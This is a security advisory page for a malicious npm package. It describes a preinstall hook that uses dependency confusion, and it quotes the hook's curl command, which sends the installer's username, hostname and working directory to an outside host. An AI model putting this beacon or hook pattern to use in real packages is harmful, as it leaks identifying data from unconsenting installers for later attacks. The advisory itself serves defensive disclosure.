mamadoos-test @11.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4605
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$(whoami)@$(hostname)?pwd=$(pwd) , embedding the installer's OS username, hostname, and current working directory into the URL path/query. This fires unconditionally on npm install with no opt-in, leaking host-identifying information to a third-party endpoint. The package additionally declares itself as a dependency ( mamadoos-test: ^10.0.0 ), a shape consistent with a dependency-confusion probe — installs of a colliding internal name resolve to this public package and beacon back. Regardless of whether the intent is research or active targeting, the installer-side effect is unconsented exfiltration of identifiers useful for follow-on attacks (locating internal hosts, mapping CI environments, fingerprinting build paths).
Source: amazon-inspector (21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.